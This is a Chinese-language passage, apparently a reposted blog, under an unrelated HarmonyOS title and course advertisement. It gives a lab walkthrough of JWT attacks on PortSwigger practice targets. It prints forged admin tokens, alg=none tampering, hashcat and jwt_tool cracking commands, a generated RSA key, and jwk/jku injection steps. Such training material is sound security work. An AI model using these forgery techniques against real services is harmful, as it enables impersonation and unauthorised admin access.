2024年HarmonyOS鸿蒙最全JWT渗透姿势一篇通(6),2024年最新详细的HarmonyOS鸿蒙学习指南

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!


img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上鸿蒙开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

    } catch (Exception e) {  
        System.out.println("Invalid JWT: " + e.getMessage());  
    }  
}  

}


在上面的示例代码中使用jwt库进行JWT的签名和验证,首先构建了一个JWT,然后将其分离为Header、Payload和Signature三部分,使用parseClaimsJws函数对JWT进行解析和验证,从而获取其中的Payload中的信息并进行验证,最后如果解析和验证成功,则说明JWT是有效的,否则说明JWT是无效的,在实际应用中应该将SECRET\_KEY替换为应用程序的密钥


###### 漏洞案例


JWT库会通常提供一种验证令牌的方法和一种解码令牌的方法,比如:Node.js库jsonwebtoken有verify()和decode(),有时开发人员会混淆这两种方法,只将传入的令牌传递给decode()方法,这意味着应用程序根本不验证签名,而我们下面的使用则是一个基于JWT的机制来处理会话,由于实现缺陷服务器不会验证它收到的任何JWT的签名,如果要解答实验问题,您需要修改会话令牌以访问位于/admin的管理面板然后删除用户carlos,您可以使用以下凭据登录自己的帐户:wiener:peter  
 靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature


![](https://img-blog.csdnimg.cn/img_convert/20355e4272c87d07e4a74ab4f1afc8cd.png)


演示步骤:  
 Step 1:点击上方的"Access the Lab"访问靶场并登录账户


![](https://img-blog.csdnimg.cn/img_convert/49c6f10359a5db5a3b95aaad42f31234.png)


Step 2:进入到Web界面并登录靶场账户



wiener:peter


![](https://img-blog.csdnimg.cn/img_convert/a32c93fe2d3a1e7aed4cb90726899640.png)


![](https://img-blog.csdnimg.cn/img_convert/30fb4b8b7d03db8ab8992338d5db6cd0.png)


登录之后会看到如下一个更新邮箱的界面


![](https://img-blog.csdnimg.cn/img_convert/8da2529ff678e6b1be73b02b9cf43813.png)


Step 3:此时在我们的burpsuite中我们可以看到如下的会话信息


![](https://img-blog.csdnimg.cn/img_convert/a15e902f952b23670940fcc947377df7.png)


此时查询当前用户可以看到会显示当前用户为wiener:


![](https://img-blog.csdnimg.cn/img_convert/6a98e1a516edbfab6ec30c25b763be56.png)


截取上面中间一部分base64编码的部分更改上面的sub为"administrator"



eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5MDA4M30


![](https://img-blog.csdnimg.cn/img_convert/db4ca7eca8eed48ce7afaeeede335a0c.png)


构造一个sub为"administrator"的载荷并将其进行base64编码处理:



eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTAwODN9


![](https://img-blog.csdnimg.cn/img_convert/5dadb68a3eb08211c2bc086158decd0d.png)


替换之后重新发送请求:


![](https://img-blog.csdnimg.cn/img_convert/172f8db34a26cf6383beedf1582a8555.png)


按照题目要求访问/admin路径,发现两个删除用户的调用接口:


![](https://img-blog.csdnimg.cn/img_convert/55194108526f7db6b92b67e89db8a892.png)


请求敏感链接——删除用户carlos



GET /admin/delete?username=carlos HTTP/1.1


![](https://img-blog.csdnimg.cn/img_convert/255c441915f339fc9e46869cd336b061.png)


完成靶场的解答:


![](https://img-blog.csdnimg.cn/img_convert/270f599ca8c96cd54c18b94533acad45.png)


##### 签名用None


###### 场景介绍


在JWT的Header中alg的值用于告诉服务器使用哪种算法对令牌进行签名,从而告诉服务器在验证签名时需要使用哪种算法,目前可以选择HS256,即HMAC和SHA256,JWT同时也支持将算法设定为"None",如果"alg"字段设为"None",则标识不签名,这样一来任何token都是有效的,设定该功能的最初目的是为了方便调试,但是若不在生产环境中关闭该功能,攻击者可以通过将alg字段设置为"None"来伪造他们想要的任何token,接着便可以使用伪造的token冒充任意用户登陆网站



{
“alg”: “none”,
“typ”: “JWT”
}


###### 漏洞案例


实验靶场:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification


![](https://img-blog.csdnimg.cn/img_convert/5d220007378ce8ca186e6f919638fdde.png)


实验流程:  
 Step 1:点击上方的"Access the lab"访问靶场环境  
 https://0a9c00a8030ba77784d7b92d00cc0086.web-security-academy.net/


![](https://img-blog.csdnimg.cn/img_convert/cb979409478f860bda513d4016c77624.png)


Step 2:使用账户密码进行登录



wiener:peter


![](https://img-blog.csdnimg.cn/img_convert/5b33cecddffbffffd635149ff5018cda.png)


Step 3:登录之后可以看到如下界面


![](https://img-blog.csdnimg.cn/img_convert/17a8ffb05f6cf5966a99327df950c182.png)


Step 4:捕获到的数据报信息如下所示


![](https://img-blog.csdnimg.cn/img_convert/505c6f7a6cf722ff26e181e25a264135.png)


截取JWT的第二部分对其进行base64解码:



eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5MzQ5M30


![](https://img-blog.csdnimg.cn/img_convert/26672bbcc5689a94d6f5194887a2d885.png)


将上述的sub字段值更改为"administrator"



eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTM0OTN9


![](https://img-blog.csdnimg.cn/img_convert/bb5534cbbbd15cae43f8490e803f2f4a.png)


Step 4:在使用wiener用户的凭据访问/admin是会提示401 Unauthorized


![](https://img-blog.csdnimg.cn/img_convert/7c3c6e2cab388542dec5f03f09139936.png)


Step 5:将第一步分的alg参数改为none



eyJraWQiOiIyNmNlNGNmMi0wYjFhLTQzZTUtOWYzNy1kOTA2ZjkxZmY2MzkiLCJhbGciOiJSUzI1NiJ9


![](https://img-blog.csdnimg.cn/img_convert/db4301ce736851f2a854d95b753b3f6f.png)


更改之后的header部分:



eyJraWQiOiIyNmNlNGNmMi0wYjFhLTQzZTUtOWYzNy1kOTA2ZjkxZmY2MzkiLCJhbGciOiJub25lIn0=


![](https://img-blog.csdnimg.cn/img_convert/ecca0d16a2df747b8d6851c55ff15113.png)


替换JWT Token中的第二部分为之前我们构造的信息,同时移除签名部分,再次请求数据获取到敏感数据链接


![](https://img-blog.csdnimg.cn/img_convert/d9973bad615d89824b641fbdf290b756.png)


调用敏感链接移除用户信息,完成解题操作:


![](https://img-blog.csdnimg.cn/img_convert/f6f4d922b47ce7523df5591c5fad541d.png)


![](https://img-blog.csdnimg.cn/img_convert/c69eb39073f6616ce688c574701cccd5.png)


##### 密钥暴力猜解


###### 密钥介绍


在JT中密钥用于生成和验证签名,因此密钥的安全性对JWT的安全性至关重要,一般来说JWT有以下两种类型的密钥:


* 对称密钥:对称密钥是一种使用相同的密钥进行加密和解密的加密算法,在JWT中使用对称密钥来生成和验证签名,因此密钥必须保密,只有发送方和接收方知道,由于对称密钥的安全性取决于密钥的保密性,因此需要采取一些措施来保护它
* 非对称密钥:非对称密钥使用公钥和私钥来加密和解密数据,在JWT中使用私钥生成签名,而使用公钥验证签名,由于公钥可以公开,因此非对称密钥通常用于验证方的身份


下面是一个使用JWT和对称密钥的JAVA示例代码:



import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;
import java.util.Date;

public class JWTExample {
private static final String SECRET_KEY = “mysecretkey”; // 设置密钥

public static void main(String\[\] args) {  
    String token \= createJWT("123456"); // 生成JWT  
    System.out.println(token);  
    String result \= parseJWT(token); // 验证JWT  
    System.out.println(result);  
}  

public static String createJWT(String id) {  
    // 设置JWT过期时间为1小时  
    long nowMillis \= System.currentTimeMillis();  
    Date now \= new Date(nowMillis);  
    long expMillis \= nowMillis + 3600000; // 1小时  
    Date exp \= new Date(expMillis);  

    // 生成JWT  
    String token \= Jwts.builder()  
        .setId(id)  
        .setIssuer("issuer")  
        .setSubject("subject")  
        .setIssuedAt(now)  
        .setExpiration(exp)  
        .signWith(SignatureAlgorithm.HS256, SECRET\_KEY)  
        .compact();  
    return token;  
}  

public static String parseJWT(String token) {  
    // 验证JWT是否合法  
    String result \= "";  
    try {  
        result \= Jwts.parser()  
            .setSigningKey(SECRET\_KEY)  
            .parseClaimsJws(token)  
            .getBody()  
            .getId();  
    } catch (Exception e) {  
        e.printStackTrace();  
    }  
    return result;  
}  

}


下面是一个使用JWT和非对称密钥的Java示例代码,代码中使用了RSA算法生成非对称密钥对:



import io.jsonwebtoken.Claims;
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;
import io.jsonwebtoken.security.Keys;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;
import java.security.PrivateKey;
import java.security.PublicKey;
import java.util.Date;

public class JWTExample {
private static final String ISSUER = “example.com”;
private static final String SUBJECT = “user@example.com”;

public static void main(String\[\] args) throws Exception {  
    KeyPair keyPair \= generateKeyPair();  

    String token \= createJWT(ISSUER, SUBJECT, keyPair.getPrivate());  
    System.out.println(token);  

    Claims claims \= parseJWT(token, keyPair.getPublic());  
    System.out.println(claims.getIssuer());  
    System.out.println(claims.getSubject());  
}  

public static String createJWT(String issuer, String subject, PrivateKey privateKey) {  
    Date now \= new Date();  
    Date expiration \= new Date(now.getTime() + 3600 \* 1000); // 1 hour  

    return Jwts.builder()  
        .setIssuer(issuer)  
        .setSubject(subject)  
        .setIssuedAt(now)  
        .setExpiration(expiration)  
        .signWith(privateKey, SignatureAlgorithm.RS256)  
        .compact();  
}  

public static Claims parseJWT(String token, PublicKey publicKey) {  
    return Jwts.parserBuilder()  
        .setSigningKey(publicKey)  
        .build()  
        .parseClaimsJws(token)  
        .getBody();  
}  

public static KeyPair generateKeyPair() throws NoSuchAlgorithmException {  
    KeyPairGenerator generator \= KeyPairGenerator.getInstance("RSA");  
    generator.initialize(2048);  
    return generator.generateKeyPair();  
}  

}


在这个示例中我们使用了Java中的KeyPairGenerator类来生成一个2048位的RSA密钥对,然后使用私钥生成JWT,使用公钥验证JWT,在创建JWT时我们设置了JWT的颁发者、主题、签发时间和过期时间并使用signWith()方法和SignatureAlgorithm.RS256算法使用私钥进行签名,在验证JWT时我们使用公钥来解析JWT并获取声明的内容,在实际的研发编码中我们一方面要妥善保管密钥,另一方面需要使用较为复杂难以被猜解的密钥作为密钥首选,例如:随机字母+数字的32位长度组合


###### 漏洞案例


在实现JWT应用程序时,开发人员有时会犯一些错误,比如:忘记更改默认密码或占位符密码,他们甚至可能复制并粘贴他们在网上找到的代码片段然后忘记更改作为示例提供的硬编码秘密,在这种情况下攻击者使用众所周知的秘密的单词列表来暴力破解服务器的秘密是很容易的,下面是一个公开已知密钥列表:  
 https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list


![](https://img-blog.csdnimg.cn/img_convert/4a5de8931edfbf05562b7bd64873eccb.png)


在这里我们也建议使用hashcat来强力破解密钥,您可以手动安装hashcat,也可以在Kali Linux上使用预先安装好的hashcat,您只需要一个来自目标服务器的有效的、签名的JWT和一个众所周知的秘密的单词表然后就可以运行以下命令,将JWT和单词列表作为参数传入:



hashcat -a 0 -m 16500 <jwt> <wordlist>


Hashcat会使用单词列表中的每个密钥对来自JWT的报头和有效载荷进行签名,然后将结果签名与来自服务器的原始签名进行比较,如果有任何签名匹配,hashcat将按照以下格式输出识别出的秘密以及其他各种详细信息,由于hashcat在本地机器上运行不依赖于向服务器发送请求,所以这个过程非常快,即使使用一个巨大的单词表一旦您确定了密钥,您就可以使用它为任何JWT报头和有效载荷生成有效的签名



<jwt>:<identified-secret>


靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key


![](https://img-blog.csdnimg.cn/img_convert/27164ca594306e0c6caeca4dd4d3bdbf.png)


实验步骤:  
 Step 1:点击上述"Access the lab"进入到靶场环境


![](https://img-blog.csdnimg.cn/img_convert/fc6cb20f15f89be75b6aedfff85cd2f5.png)


Step 2:使用以下账户进行登录操作



wiener:peter


![](https://img-blog.csdnimg.cn/img_convert/de3306d1e301d5fdd49e03bd04b51bf5.png)


Step 3:捕获到如下有效的JWT凭据信息



eyJraWQiOiI4M2RhOGNjMi1hZmZiLTRmZGMtYWMwYS1iMWNmMTBkNjkyZGYiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5NjQwMn0.IhZV-7RHTpEcQvkcZOA3knCYmQD0YUg-NFMj9fWSFjw


![](https://img-blog.csdnimg.cn/img_convert/e41f2322da184291255af15027618ff7.png)


![](https://img-blog.csdnimg.cn/img_convert/fa2b2b1fb544e7a2c57cfbbdb67e41c4.png)


Step 5:使用字典进行暴力猜解操作


方式一:HashCat  
 项目地址:https://github.com/hashcat/hashcat  
 项目使用:



#命令格式:
hashcat -a 0 -m 16500 <jwt> <wordlist>

#执行示例:
hashcat -m 16500 jwt.txt -a 0 secrets.txt --force


![](https://img-blog.csdnimg.cn/img_convert/5eed332b0dae9214154babb273e075c5.png)


方式二:jwt\_tool  
 项目地址:https://github.com/ticarpi/jwt\_tool  
 项目介绍:此项目主要用于JWT安全脆弱性评估,目前支持如下几种安全评估测试


* (CVE-2015-2951) The alg=none signature-bypass vulnerability
* (CVE-2016-10555) The RS/HS256 public key mismatch vulnerability
* (CVE-2018-0114) Key injection vulnerability
* (CVE-2019-20933/CVE-2020-28637) Blank password vulnerability
* (CVE-2020-28042) Null signature vulnerability


![](https://img-blog.csdnimg.cn/img_convert/7e86faf48c8acfdf557896946211d71b.png)


Step 1:克隆项目到本地



https://github.com/ticarpi/jwt_tool


![](https://img-blog.csdnimg.cn/img_convert/ca710f69f29545a575f820cad7444841.png)


Step 2:安装依赖库



pip3 install pycryptodomex


Step 3:运行jwt\_tool并查看用法信息



python3 jwt_tool.py -h


![](https://img-blog.csdnimg.cn/img_convert/2cfea5f45aaf69d6b37aa646d01abe3f.png)



usage: jwt_tool.py [-h] [-b] [-t TARGETURL] [-rc COOKIES] [-rh HEADERS] [-pd POSTDATA] [-cv CANARYVALUE] [-np] [-nr] [-M MODE] [-X EXPLOIT] [-ju JWKSURL] [-S SIGN] [-pr PRIVKEY] [-T] [-I] [-hc HEADERCLAIM] [-pc PAYLOADCLAIM] [-hv HEADERVALUE]
[-pv PAYLOADVALUE] [-C] [-d DICT] [-p PASSWORD] [-kf KEYFILE] [-V] [-pk PUBKEY] [-jw JWKSFILE] [-Q QUERY] [-v]
[jwt]

positional arguments:
jwt the JWT to tinker with (no need to specify if in header/cookies)

options:
-h, --help show this help message and exit
-b, --bare return TOKENS ONLY
-t TARGETURL, --targeturl TARGETURL
URL to send HTTP request to with new JWT
-rc COOKIES, --cookies COOKIES
request cookies to send with the forged HTTP request
-rh HEADERS, --headers HEADERS
request headers to send with the forged HTTP request (can be used multiple times for additional headers)
-pd POSTDATA, --postdata POSTDATA
text string that contains all the data to be sent in a POST request
-cv CANARYVALUE, --canaryvalue CANARYVALUE
text string that appears in response for valid token (e.g. “Welcome, ticarpi”)
-np, --noproxy disable proxy for current request (change in jwtconf.ini if permanent)
-nr, --noredir disable redirects for current request (change in jwtconf.ini if permanent)
-M MODE, --mode MODE Scanning mode:
pb = playbook audit
er = fuzz existing claims to force errors
cc = fuzz common claims
at - All Tests!
-X EXPLOIT, --exploit EXPLOIT
eXploit known vulnerabilities:
a = alg:none
n = null signature
b = blank password accepted in signature
s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)
k = key confusion (specify public key with -pk)
i = inject inline JWKS
-ju JWKSURL, --jwksurl JWKSURL
URL location where you can host a spoofed JWKS
-S SIGN, --sign SIGN sign the resulting token:
hs256/hs384/hs512 = HMAC-SHA signing (specify a secret with -k/-p)
rs256/rs384/hs512 = RSA signing (specify an RSA private key with -pr)
es256/es384/es512 = Elliptic Curve signing (specify an EC private key with -pr)
ps256/ps384/ps512 = PSS-RSA signing (specify an RSA private key with -pr)
-pr PRIVKEY, --privkey PRIVKEY
Private Key for Asymmetric crypto
-T, --tamper tamper with the JWT contents
(set signing options with -S or use exploits with -X)
-I, --injectclaims inject new claims and update existing claims with new values
(set signing options with -S or use exploits with -X)
(set target claim with -hc/-pc and injection values/lists with -hv/-pv
-hc HEADERCLAIM, --headerclaim HEADERCLAIM
Header claim to tamper with
-pc PAYLOADCLAIM, --payloadclaim PAYLOADCLAIM
Payload claim to tamper with
-hv HEADERVALUE, --headervalue HEADERVALUE
Value (or file containing values) to inject into tampered header claim
-pv PAYLOADVALUE, --payloadvalue PAYLOADVALUE
Value (or file containing values) to inject into tampered payload claim
-C, --crack crack key for an HMAC-SHA token
(specify -d/-p/-kf)
-d DICT, --dict DICT dictionary file for cracking
-p PASSWORD, --password PASSWORD
password for cracking
-kf KEYFILE, --keyfile KEYFILE
keyfile for cracking (when signed with ‘kid’ attacks)
-V, --verify verify the RSA signature against a Public Key
(specify -pk/-jw)
-pk PUBKEY, --pubkey PUBKEY
Public Key for Asymmetric crypto
-jw JWKSFILE, --jwksfile JWKSFILE
JSON Web Key Store for Asymmetric crypto
-Q QUERY, --query QUERY
Query a token ID against the logfile to see the details of that request
e.g. -Q jwttool_46820e62fe25c10a3f5498e426a9f03a
-v, --verbose When parsing and printing, produce (slightly more) verbose output.

If you don’t have a token, try this one:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po


Step 4:暴力猜解密钥



#命令格式
python3 jwt_tool.py JWT_HERE -C -d dictionary.txt

#执行示例
python3 jwt_tool.py eyJraWQiOiI4M2RhOGNjMi1hZmZiLTRmZGMtYWMwYS1iMWNmMTBkNjkyZGYiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5NjQwMn0.IhZV-7RHTpEcQvkcZOA3knCYmQD0YUg-NFMj9fWSFjw -C -d secrets.txt


![](https://img-blog.csdnimg.cn/img_convert/7d2321e46b260430f6371898e2c6080c.png)


附加扩展:



#尝试破解密钥(HMAC算法)
python3 jwt_tool.py JWT_HERE -C -d dictionary.txt

#尝试使用已知的公钥对不对称密码(RS-,EC-,PS-)进行"密钥混淆"攻击
python3 jwt_tool.py JWT_HERE -K -pk my_public.pem

#尝试使用"无"算法来创建未验证的令牌
python3 jwt_tool.py JWT_HERE -A

#处理JSON Web密钥存储文件,重建公共密钥,然后测试密钥以查看验证令牌的密钥
python3 jwt_tool.py JWT_HERE -J -jw jwks.json

#生成一个新的RSA密钥对,将公钥作为JSON Web密钥存储对象注入令牌并使用私钥对令牌签名
python3 jwt_tool.py JWT_HERE -I

#欺骗远程JWKS:生成新的RSA密钥对,将提供的URL注入令牌,将公共密钥导出为JSON Web密钥存储对象(以提供的URL进行服务)并使用私钥对令牌签名
python3 jwt_tool.py JWT_HERE -S -u http://example.com/jwks.json


Step 5:随后在网页端重新设置密钥(secret1)并重新产生的字符串  
 Header:



eyJraWQiOiJjY2Y4Yjk3YS05NGZlLTRjN2QtOWI2MS0yNzZmMDY1NGMyZWIiLCJhbGciOiJIUzI1NiJ9
{“kid”:“ccf8b97a-94fe-4c7d-9b61-276f0654c2eb”,“alg”:“HS256”}


![](https://img-blog.csdnimg.cn/img_convert/e67d4c2480d5f27dd75a47b370779068.png)


payload(前):



eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5OTk1OX0
{“iss”:“portswigger”,“sub”:“wiener”,“exp”:1687799959}


![](https://img-blog.csdnimg.cn/img_convert/5f18faf02ceff672ede4f2c0d1ed1771.png)


payload(新):



{“iss”:“portswigger”,“sub”:“administrator”,“exp”:1687799959}
eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTk5NTl9


![](https://img-blog.csdnimg.cn/img_convert/a61f9549ea0907cbca6bab946e31ae2b.png)


Signer:



E891AutpjiwkhVUDV2dZdrfGzsv5TweyIUUhT_a1Ar0


![](https://img-blog.csdnimg.cn/img_convert/006aa263adb2de5b52838e06eb85142e.png)


最终高权限的JWT token如下:



eyJraWQiOiJjY2Y4Yjk3YS05NGZlLTRjN2QtOWI2MS0yNzZmMDY1NGMyZWIiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTk5NTl9.E891AutpjiwkhVUDV2dZdrfGzsv5TweyIUUhT_a1Ar0


![](https://img-blog.csdnimg.cn/img_convert/43347a80f8eb65a67ce31b7c0f40553c.png)


Step 6:访问/admin路径


![](https://img-blog.csdnimg.cn/img_convert/92ec3d7c63d6fa7410026b86d6796c48.png)


Step 7:调用接口删除用户完成解答


![](https://img-blog.csdnimg.cn/img_convert/c391f557b0170fc8d617acfb705e9f80.png)


![](https://img-blog.csdnimg.cn/img_convert/17ee37a02958b96c02b48f062281fbde.png)


###### JWT头部注入


###### 场景介绍


如果服务器端使用一个非常脆弱的密钥,我们甚至有可能一个字符一个字符地来暴力破解这个密钥,根据JWS规范只有alg报头参数是强制的,然而在实践中JWT报头通常包含几个其他参数,以下是攻击者特别感兴趣的:


* jwk(JSON Web Key):提供一个代表密钥的嵌入式JSON对象
* jku(JSON Web Key Set URL):提供一个URL,服务器可以从这个URL获取一组包含正确密钥的密钥
* kid(密钥id):提供一个ID,在有多个密钥可供选择的情况下服务器可以用它来识别正确的密钥,根据键的格式这可能有一个匹配的kid参数


这些用户可控制的参数每个都告诉接收方服务器在验证签名时应该使用哪个密钥,下面我们将介绍如何利用这些参数来注入使用您自己的任意密钥而不是服务器的密钥签名修改过的JWT


###### 注入场景1


下面我们介绍如何通过JWK参数注入自签名的JWT,JWS(JSON Web Signature)规范描述了一个可选的jwk header参数,服务器可以使用该参数以jwk格式将其公钥直接嵌入令牌本身,您可以在下面的JWT head中看到具体的示例:



{
“kid”: “ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG”,
“typ”: “JWT”,
“alg”: “RS256”,
“jwk”: {
“kty”: “RSA”,
“e”: “AQAB”,
“kid”: “ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG”,
“n”: “yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9m”
}
}


理想情况下服务器应该只使用有限的公钥白名单来验证JWT签名,然而错误配置的服务器有时会使用jwk参数中嵌入的键值,您可以通过使用自己的RSA私钥对修改后的JWT进行签名,然后在jwk头中嵌入匹配的公钥来利用这种行为,Burpsuite的JWT Editor扩展提供了一个有用的功能来帮助您测试此漏洞,您可以在Burp中手动添加或修改JWT参数  
 靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection


![](https://img-blog.csdnimg.cn/img_convert/9359828aa4afffe835be415f0eddc9e7.png)


Step 1:点击"ACCESS THE LAB"访问靶场


![](https://img-blog.csdnimg.cn/img_convert/8a83f2949bca4915cf49231d118999c8.png)


Step 3:点击"My Account"登录系统



wiener:peter


![](https://img-blog.csdnimg.cn/img_convert/65ad78d6657d6600a57482e2c275570e.png)


Step 4:登录之后可以看到如下邮箱更新界面


![](https://img-blog.csdnimg.cn/img_convert/402bf59033a1a5f5584c7726dd877db7.png)


Step 5:下面我们开始操作,不过在此之前我们得先武器化以下自己,在Burpsuite界面选择"Extender"选项卡,紧接着点击"BApp Store"安装"JWT Editor"


![](https://img-blog.csdnimg.cn/img_convert/33fd58a8436b4f54a374e000e9364a67.png)


之后你可以看到如下的选项卡界面


![](https://img-blog.csdnimg.cn/img_convert/f51f0a3d2258b2ddf3ea52be2d682fcf.png)


Step 6:生成一个新的RSA密钥



{
“p”: “8J0fgpxQpZOvPGb2rRsJB6Bh0lgvxRtp_Ilc7NmpI3UgEUiArSey091pT3X6lIPRZLdMf_eeYo_PWh5aq79Ps_xoZHtAz4VrR9sR8tCkND-z0KKBmopkUrowJie368xoWDU53P-4qxEfCfqPPxoZZRzhE7cse0PUVayNAJC01FU”,
“kty”: “RSA”,
“q”: “1zMkdJNLYEdZYvZ31B15CmCfI9dOGEpn6lyXOEBPsqrP554x_8dXZnXSHbybiYyeLgl6i_JubJBqjeSAejwHh9v-e3-R9-7Dgg4lB_OUNqsg7yM3mcpZn7IHeGVKj9BjhigWsbUXFuwM1iEDK4TDmTV4-tO9UMsIBQA1SFlUTA8”,
“d”: “Ayw2AASn_yn6EwjqCts6_gP6NZ9BlNhCG1iuDTX9h_AGWYBtUepdgp4CaM098ZyjH2Da3RvonFVlTOwHTgVAdkb2eWqeMejMjUji3cKIQRU_r0UeY3C4q8BBuWjwzF7ZTeVDgbx05NfeUW0LwWE3mFBuPDy6tmvYdekcs8Ft7GDmU_ToPZaGnMoEKzVlMyDb82LgkB7qWw2H4UoXHWR0l_RS90gTjkJzMc4Fmu4CoPfmqw8jLnGgq8GhAzpecc-VLvqel3tSY0fKqF5Y3U2SooL27vJJxX0kLgHVbcTNvCcS8XZArdhWTekV923jtspoNDYn5HfhAlLglCcwQcOSYQ”,
“e”: “AQAB”,
“kid”: “fa018615-0392-4d15-89bb-a2c637d9adbd”,
“qi”: “XO3HEFj8PCxFz4DIw0djHjTrW4Krm-Oim-U4bmuEdmPDKKTIYYvkPVoSRR-4kCHkCx2aDsraUbNkTyEYC4dRUbnWl6xr2HxaLZIsxOglYsa939l_m6NXSzttAGrPpWqoURT7t6ihSmBnGDJDsMS3c1gWJKZsAYkeXy5lI2IhGks”,
“dp”: “0gfldIZsY0w5_9jE5LAfvreCDDGMaVsXtihVpC4PVXMs7clDAWMQ152DCqiqdi9mfar_LQkCCXkM_9ZVQWw675qZqXRpS3xj_BI_ZZw4aZ9dn_XqefLpxcjetL-g7US9pJm5i67xDOpiFLzRg7yNhFSkKCiRvHumAq8fWen23w0”,
“dq”: “QcZI6zSmAjxsjrnkcDm96DUWDv9cyEHdtx0rvy6w7VwWBaYthA8qoI98dEhUhdsr8chF44Zqx9XwK4Re3H2Ck7zi8F5SgCRDL3ohSWfisj7l5xGtidz2PcBNVjgnbQN1l-ii3xgJgaEOX1hhvqhqnGZins-e-pXD0rt4ja93-3M”,
“n”: “ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w”
}


![](https://img-blog.csdnimg.cn/img_convert/1061654b8f5a2ee9821a4c9d583ee364.png)


Step 7:刷新页面拦截到请求并将请求发送到Repeat模块


![](https://img-blog.csdnimg.cn/img_convert/5c0838e26b351d9cb21217410b442e9e.png)


Step 8:在Repeat模块,我们切换到JSON Web Token选项卡,修改JWT的有效负载将sub内容修改为administrator


![](https://img-blog.csdnimg.cn/img_convert/70e42520b6405c58800352cc12c131f3.png)


![](https://img-blog.csdnimg.cn/img_convert/400b19a4d4e0defeafd84401e9f2ff5f.png)


Step 9:点击"Attack",然后选择"Embedded JWK",出现提示时选择您新生成的RSA密钥


![](https://img-blog.csdnimg.cn/img_convert/9fbb559c29f4ac9bb8500738114d0ec1.png)


![](https://img-blog.csdnimg.cn/img_convert/f1a3230c8a785e2f2e9f777404e84ed1.png)


Step 10:之后成功越权


![](https://img-blog.csdnimg.cn/img_convert/5b1c69e6b1cab646e6df892c821768f2.png)


Step 11:调用敏感操作接口删除carlos用户完成解题


![](https://img-blog.csdnimg.cn/img_convert/80dbeee29f4ce4eda531b37d22e2dbb8.png)


![](https://img-blog.csdnimg.cn/img_convert/492ddc5b64cf18ca1fa3a663c5d9ac34.png)


###### 注入场景2


有些服务器可以使用jku(jwk Set URL)头参数来引用包含密钥的JWK集,而不是直接使用JWK头参数来嵌入公钥,当验证签名时,服务器从这个URL获取相关的密钥,这里的JWK集其实是一个JSON对象,包含一个代表不同键的JWK数组,下面是一个简单的例子:



{
“keys”: [
{
“kty”: “RSA”,
“e”: “AQAB”,
“kid”: “75d0ef47-af89-47a9-9061-7c02a610d5ab”,
“n”: “o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ”
},
{
“kty”: “RSA”,
“e”: “AQAB”,
“kid”: “d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA”,
“n”: “fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw”
}
]
}


JWK集合有时会通过一个标准端点公开,比如:/.well-known/jwks.json,更安全的网站只会从受信任的域获取密钥,但有时您可以利用URL解析差异来绕过这种过滤,下面我们通过一个靶场来实践以下  
 靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection


![](https://img-blog.csdnimg.cn/img_convert/a655f442db0bf29bcdfe488fb5e76132.png)


